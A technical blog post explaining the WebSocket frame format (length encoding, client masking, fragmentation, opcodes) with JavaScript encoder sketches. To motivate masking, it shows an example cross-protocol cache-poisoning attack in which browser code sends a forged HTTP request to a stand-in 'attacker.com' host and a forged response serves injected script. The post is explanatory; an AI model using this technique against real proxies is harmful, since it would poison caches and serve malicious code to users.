WebSockets are great: they provide a persistent two-way communication channel over a single TCP connection. They allow for real-time data exchange, so they're used in chat apps, collaborative tools, and some AI APIs, among other things.
I recently wrote a WebSocket parser for Subtrace, and was surprised at how simple the (base) protocol is. The RFC felt almost... readable. The message format does just what it needs to do, and no more.
If you just want to play around with a WebSocket encoder, there's one at the bottom of the page.
WebSocket communication is built on a simple structure: both sides of the connection exchange messages, and each message is made up of one or more frames. Let's start by assuming messages are just single frames, and we'll build from there.
Here's a simple (but valid!) WebSocket message that says "Hello":
Ignoring the header byte (we'll get to it later), this is literally just the message length (5) followed by the payload ("Hello" in UTF-8). Simple, right?
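To make that concrete, here's a minimal sketch of an encoder for this simplest case. The function names are mine, it only handles payloads up to 125 bytes, and I'm assuming the header byte is 0x81 (a final, text frame), which is what a single-frame text message uses.

```javascript
// Build an unmasked, single-frame text message (payloads up to 125 bytes only).
function encodeShortTextFrame(text) {
  const payload = new TextEncoder().encode(text); // UTF-8 bytes
  if (payload.length > 125) {
    throw new RangeError("this sketch only handles payloads up to 125 bytes");
  }
  const frame = new Uint8Array(2 + payload.length);
  frame[0] = 0x81;           // header byte (assumed: final frame, text)
  frame[1] = payload.length; // payload length
  frame.set(payload, 2);     // payload bytes
  return frame;
}

// Format bytes as space-separated hex for display.
function toHex(bytes) {
  return Array.from(bytes, (b) => b.toString(16).padStart(2, "0")).join(" ");
}

console.log(toHex(encodeShortTextFrame("Hello")));
// prints "81 05 48 65 6c 6c 6f"
```

After the header byte you can read it off directly: 05 is the length, and 48 65 6c 6c 6f is "Hello".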
Okay, the full story is a bit more than that.
A WebSocket client MUST mask (scramble) all the messages it sends to the server. If you're like me and you're wondering how "client" and "server" apply to WebSockets: the client initiates the connection with an HTTP request, and the server responds with a 101 Switching Protocols, after which the connection switches to WebSocket.
Masking requires a 4-byte masking key, so let's use a1 b2 c3 d4. Here's what our "Hello" message looks like now:
The masked payload is obtained by XORing the original payload "Hello" with the masking key one byte at a time, repeating the masking key as necessary.
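The XOR step can be sketched in a few lines. applyMask is a name I made up; the key is the a1 b2 c3 d4 from above.

```javascript
// XOR each payload byte with the masking key, cycling through the key's 4 bytes.
// Applying the same function again with the same key restores the original.
function applyMask(payload, key) {
  const out = new Uint8Array(payload.length);
  for (let i = 0; i < payload.length; i++) {
    out[i] = payload[i] ^ key[i % 4];
  }
  return out;
}

const hex = (bytes) =>
  Array.from(bytes, (b) => b.toString(16).padStart(2, "0")).join(" ");

const key = Uint8Array.of(0xa1, 0xb2, 0xc3, 0xd4);
const masked = applyMask(new TextEncoder().encode("Hello"), key);

console.log(hex(masked)); // prints "e9 d7 af b8 ce"
console.log(new TextDecoder().decode(applyMask(masked, key))); // prints "Hello"
```

Since XOR is its own inverse, masking and unmasking are the same operation. That's why one function is enough.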
It's a bit kludgy, but it was a safety measure against cross-protocol attacks back when WebSockets were relatively new.
Imagine attacker.com opens a WebSocket connection from the user's browser to its own server. It then sends a WebSocket message that looks like an HTTP GET request:
// on the user's browser
const socket = new WebSocket("ws://attacker.com");
socket.onopen = () => socket.send(
  "GET /jquery.min.js HTTP/1.1\r\n" +
  "Host: cdn.jquery.com\r\n" +
  "User-Agent: Mozilla/5.0\r\n" +
  "Accept: */*\r\n" +
  "Connection: keep-alive\r\n\r\n"
);
If there's no masking, these bytes are sent verbatim over the wire by the browser. If there's a caching proxy that doesn't parse WebSocket traffic correctly, it may treat this as a legitimate HTTP request.
Now attacker.com sends back a WebSocket message that looks like an HTTP response:
HTTP/1.1 200 OK
Content-Type: application/javascript
Content-Length: 1337
Cache-Control: public, max-age=86400

alert('pwned');
The proxy caches this since it looks like a valid HTTP response. The next time a user requests cdn.jquery.com/jquery.min.js, they are served the malicious version from the cache.
To prevent this, each client → server frame is masked with a different randomly generated key. This prevents HTTP proxies from accidentally interpreting these bytes as anything else.
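Here's a rough sketch of what a client does for each frame it sends. The function names are hypothetical and it only handles payloads up to 125 bytes. The layout (mask bit in the second byte, key right after the length, then the masked payload) follows RFC 6455.

```javascript
// Web Crypto is global in browsers and recent Node; the fallback covers older Node.
const webcrypto = globalThis.crypto ?? require("node:crypto").webcrypto;

// Encode a client-to-server text frame with a fresh random masking key.
function encodeMaskedTextFrame(text) {
  const payload = new TextEncoder().encode(text);
  if (payload.length > 125) throw new RangeError("payload too long for this sketch");
  const key = webcrypto.getRandomValues(new Uint8Array(4)); // new key for every frame
  const frame = new Uint8Array(2 + 4 + payload.length);
  frame[0] = 0x81;                  // final frame, text
  frame[1] = 0x80 | payload.length; // mask bit set + 7-bit length
  frame.set(key, 2);                // masking key follows the length
  for (let i = 0; i < payload.length; i++) {
    frame[6 + i] = payload[i] ^ key[i % 4];
  }
  return frame;
}

// What the receiving side does to recover the text from such a frame.
function decodeMaskedShortFrame(frame) {
  const length = frame[1] & 0x7f;
  const key = frame.subarray(2, 6);
  const payload = frame.subarray(6, 6 + length).map((b, i) => b ^ key[i % 4]);
  return new TextDecoder().decode(payload);
}

const request = "GET /jquery.min.js HTTP/1.1\r\n";
const frame = encodeMaskedTextFrame(request);
console.log(decodeMaskedShortFrame(frame) === request); // prints true
```

The key travels in the clear inside the frame, so this isn't encryption. The point is only that the page's script can't predict the key, so it can't choose the bytes that end up on the wire.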
That being said, masking is less critical than it used to be:
(Note that server → client frames aren't masked, since this risk only exists in browser-initiated traffic. In fact, server → client frames MUST NOT be masked.)
Notice that the second byte went from 05 to 85 even though the length of the message hasn't changed. It turns out the most significant bit (MSB) of this byte tells us whether the payload is masked. The remaining 7 bits give us the payload length.
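In code, pulling those two fields apart is just a pair of bit masks. This is a small sketch; parseSecondByte is my own name for it.

```javascript
// Split the second byte of a frame into the mask flag and the 7-bit value.
function parseSecondByte(byte) {
  return {
    masked: (byte & 0x80) !== 0, // most significant bit
    val: byte & 0x7f,            // remaining 7 bits
  };
}

console.log(parseSecondByte(0x05)); // logs { masked: false, val: 5 }
console.log(parseSecondByte(0x85)); // logs { masked: true, val: 5 }
```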
Well, kind of.
Using 7 bits for the payload length allows us to specify a payload that's at most 127 bytes. What if we need more than that?
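Let's call that 7-bit integer val (so the full byte is mask+val). Depending on what val is, there are different ways to represent the payload length:
val ≤ 125: val itself is the payload length.
val = 126: the next 2 bytes hold the payload length as a 16-bit unsigned integer, most significant byte first.
val = 127: the next 8 bytes hold the payload length as a 64-bit unsigned integer, most significant byte first. Its top bit must be 0.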
This means you could technically encode a 2^63 - 1 byte (9.2 exabyte) message in one single frame. But you'll pretty much never see such large messages in practice, since most WebSocket libraries buffer entire messages in memory. Besides, there are other ways to encode long messages.
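Here's a sketch of the length field in both directions, following the RFC 6455 rules: val up to 125 is the length itself, 126 means a 16-bit length follows, and 127 means a 64-bit length follows (big-endian in both cases). The function names are mine. To keep things simple, the decoder refuses lengths above Number.MAX_SAFE_INTEGER rather than handing back a BigInt.

```javascript
// Encode the mask bit + payload length as 1, 3, or 9 bytes.
function encodePayloadLength(length, masked) {
  if (!Number.isSafeInteger(length) || length < 0) throw new RangeError("bad length");
  const maskBit = masked ? 0x80 : 0x00;
  if (length <= 125) return Uint8Array.of(maskBit | length);
  if (length <= 0xffff) {
    const out = new Uint8Array(3);
    out[0] = maskBit | 126;
    new DataView(out.buffer).setUint16(1, length); // big-endian by default
    return out;
  }
  const out = new Uint8Array(9);
  out[0] = maskBit | 127;
  new DataView(out.buffer).setBigUint64(1, BigInt(length)); // big-endian by default
  return out;
}

// Decode a length field; `bytes` must start at the frame's second byte.
function decodePayloadLength(bytes) {
  const view = new DataView(bytes.buffer, bytes.byteOffset, bytes.byteLength);
  const val = bytes[0] & 0x7f;
  if (val <= 125) return val;
  if (val === 126) return view.getUint16(1);
  const length = view.getBigUint64(1);
  if (length > BigInt(Number.MAX_SAFE_INTEGER)) {
    throw new RangeError("length too large for this sketch");
  }
  return Number(length);
}

const hex = (bytes) =>
  Array.from(bytes, (b) => b.toString(16).padStart(2, "0")).join(" ");

console.log(hex(encodePayloadLength(5, true)));     // prints "85"
console.log(hex(encodePayloadLength(200, false)));  // prints "7e 00 c8"
console.log(hex(encodePayloadLength(70000, true))); // prints "ff 00 00 00 00 00 01 11 70"
```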
As mentioned earlier, WebSocket messages can span multiple frames. When that happens, the individual payloads from each frame are concatenated to get the complete message. For example, if a WebSocket client receives these two frames in this order:
The client reads a single message "Hello world!". This also works with masked frames: just unmask each frame's payload with that frame's key before concatenating.
If a message can have multiple frames, what dictates its boundaries? It's finally time to talk about that header byte. Let's look at the structure of the header, using the headers from the two frames above as examples:
FIN: If set, this is the final frame in a message. This is how message boundaries are determined.
RSV1, RSV2, RSV3: These three bits are "reserved." They're all 0 in most normal WebSocket traffic. We'll ignore these for now but maybe return to them another day when we talk about compression.
Opcode: These 4 bits tell us what kind of frame this is.
0000: Continuation - continues a fragmented message started by a previous frame.
0001: Text - carries UTF-8 encoded text data.
0010: Binary - carries arbitrary binary data; interpretation is left to the application.
1000: Close - initiates a connection shutdown and may include a status code and reason.
1001: Ping - checks if the connection is alive. Can be sent at any time, even in the middle of a fragmented message.
1010: Pong - replies to a ping. Like ping, it can appear between frames of a fragmented message.
And that's (almost) all there is to it! There's more to talk about like compression and how a WebSocket connection is even established, but we'll leave those for another time.
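To tie the header byte back to fragmentation, here's a sketch that splits a header byte into its fields and stitches frames back into messages. The names are mine. I'm assuming the payloads are already unmasked, and that "Hello world!" was split as "Hello" + " world!" (any split works the same way). There's no validation here, so treat it as an illustration rather than a conforming parser.

```javascript
const OPCODE_NAMES = {
  0x0: "continuation", 0x1: "text", 0x2: "binary",
  0x8: "close", 0x9: "ping", 0xa: "pong",
};

// Split the header byte into its fields.
function parseHeaderByte(byte) {
  return {
    fin: (byte & 0x80) !== 0,  // top bit
    rsv1: (byte & 0x40) !== 0,
    rsv2: (byte & 0x20) !== 0,
    rsv3: (byte & 0x10) !== 0,
    opcode: byte & 0x0f,       // low 4 bits
  };
}

// Turn a sequence of { header, payload } frames into complete messages.
function assembleMessages(frames) {
  const messages = [];
  let chunks = [];
  let kind = null;
  for (const { header, payload } of frames) {
    const { fin, opcode } = parseHeaderByte(header);
    if (opcode >= 0x8) continue; // control frames may be interleaved; skipped in this sketch
    if (opcode !== 0x0) kind = OPCODE_NAMES[opcode]; // the first frame sets the message type
    chunks.push(payload);
    if (!fin) continue; // more frames to come
    const data = new Uint8Array(chunks.reduce((n, c) => n + c.length, 0));
    let offset = 0;
    for (const c of chunks) {
      data.set(c, offset);
      offset += c.length;
    }
    // Decode text only once the message is complete:
    // a fragment boundary may fall in the middle of a UTF-8 character.
    messages.push(kind === "text" ? new TextDecoder().decode(data) : data);
    chunks = [];
    kind = null;
  }
  return messages;
}

const utf8 = (s) => new TextEncoder().encode(s);
const frames = [
  { header: 0x01, payload: utf8("Hello") },   // text, FIN not set
  { header: 0x89, payload: utf8("") },        // a ping in the middle
  { header: 0x80, payload: utf8(" world!") }, // continuation, FIN set
];

console.log(parseHeaderByte(0x81).fin, parseHeaderByte(0x81).opcode); // prints "true 1"
console.log(assembleMessages(frames)[0]); // prints "Hello world!"
```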
Generate your own WebSocket frames. Tap or hover over each set of bytes to see what they represent.
Note: I didn't cover compression here, but you can toggle it below to see how it affects things. As you might expect, it's most effective on compressible payloads like repeated strings.